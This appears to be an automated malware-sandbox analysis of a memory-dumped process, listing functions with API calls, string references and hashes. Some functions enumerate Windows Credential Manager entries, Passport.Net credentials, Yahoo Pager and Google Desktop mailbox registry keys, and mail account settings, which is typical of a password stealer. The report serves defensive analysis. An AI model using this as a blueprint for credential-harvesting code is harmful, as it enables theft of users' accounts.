                                                              • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                              • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                              • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                              Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                                              • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                              • Opcode Fuzzy Hash: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                                              • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                              Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 004016A3
                                                              • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                              • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                              • BeginPaint.USER32(?,?), ref: 004016D7
                                                              • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                              • EndPaint.USER32(?,?), ref: 004016F3
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                              • String ID:
                                                              • API String ID: 19018683-0
                                                              • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                              • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                              • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                              • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                              Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040644F
                                                              • memcpy.MSVCRT ref: 00406462
                                                              • memcpy.MSVCRT ref: 00406475
                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                                                                • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                                                              • memcpy.MSVCRT ref: 004064B9
                                                              • memcpy.MSVCRT ref: 004064CC
                                                              • memcpy.MSVCRT ref: 004064F9
                                                              • memcpy.MSVCRT ref: 0040650E
                                                                • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID:
                                                              • API String ID: 438689982-0
                                                              • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                              • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                              • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                              • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                              Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                              • strlen.MSVCRT ref: 0040F7BE
                                                              • _mbscpy.MSVCRT ref: 0040F7CF
                                                              • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                              • String ID: Passport.Net\*
                                                              • API String ID: 2329438634-3671122194
                                                              • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                              • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                              • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                              • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                              Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                              • memset.MSVCRT ref: 0040330B
                                                              • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                              • strchr.MSVCRT ref: 0040335A
                                                                • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                              • strlen.MSVCRT ref: 0040339C
                                                                • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                              • String ID: Personalities
                                                              • API String ID: 2103853322-4287407858
                                                              • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                              • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                              • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                              • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                              Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00444573
                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValuememset
                                                              • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                              • API String ID: 1830152886-1703613266
                                                              • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                              • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                              • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                              • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                              Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: H
                                                              • API String ID: 2221118986-2852464175
                                                              • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                              • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                              • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                              • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                              Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                              • API String ID: 3510742995-3170954634
                                                              • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                              • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                              • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                              • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                              Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: winWrite1$winWrite2
                                                              • API String ID: 438689982-3457389245
                                                              • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                              • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                              • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                              • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                              Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: winRead
                                                              • API String ID: 1297977491-2759563040
                                                              • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                              • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                              • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                              • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                              Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: gj
                                                              • API String ID: 1297977491-4203073231
                                                              • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                              • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                              • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                              • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                              Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetParent.USER32(?), ref: 004090C2
                                                              • GetWindowRect.USER32(?,?), ref: 004090CF
                                                              • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$ClientParentPoints
                                                              • String ID:
                                                              • API String ID: 4247780290-0
                                                              • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                              • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                              • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                              • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                              Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi$_mbscpy
                                                              • String ID: smtp
                                                              • API String ID: 2625860049-60245459
                                                              • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                              • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                              • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                              • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                              Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                              • memset.MSVCRT ref: 00408258
                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                              Strings
                                                              • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Close$EnumOpenmemset
                                                              • String ID: Software\Google\Google Desktop\Mailboxes
                                                              • API String ID: 2255314230-2212045309
                                                              • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                              • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                              • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                              • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                              Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040C28C
                                                              • SetFocus.USER32(?,?), ref: 0040C314
                                                                • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FocusMessagePostmemset
                                                              • String ID: S_@$l
                                                              • API String ID: 3436799508-4018740455
                                                              • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                              • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                              • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                              • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                              Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004092C0
                                                              • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                              • _mbscpy.MSVCRT ref: 004092FC
                                                              Strings
                                                              • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString_mbscpymemset
                                                              • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                              • API String ID: 408644273-3424043681
                                                              • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                              • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                              • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                              • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                              Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy
                                                              • String ID: C^@$X$ini
                                                              • API String ID: 714388716-917056472
                                                              • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                              • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                              • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                              • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                              Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                              • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                              • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                              • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                              • String ID: MS Sans Serif
                                                              • API String ID: 3492281209-168460110
                                                              • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                              • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                              • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                              • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                              Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ClassName_strcmpimemset
                                                              • String ID: edit
                                                              • API String ID: 275601554-2167791130
                                                              • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                              • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                              • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                              • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                              Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: strlen$_mbscat
                                                              • String ID: 3CD
                                                              • API String ID: 3951308622-1938365332
                                                              • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                              • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                              • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                              • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                              Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@$memset
                                                              • String ID:
                                                              • API String ID: 1860491036-0
                                                              • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                              • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                              • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                              • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                              Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy
                                                              • String ID:
                                                              • API String ID: 368790112-0
                                                              • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                              • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                              • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                              • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                              Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                              • too many SQL variables, xrefs: 0042C6FD
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                              • API String ID: 2221118986-515162456
                                                              • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                              • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                              • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                              • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                              Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                              • memset.MSVCRT ref: 004026AD
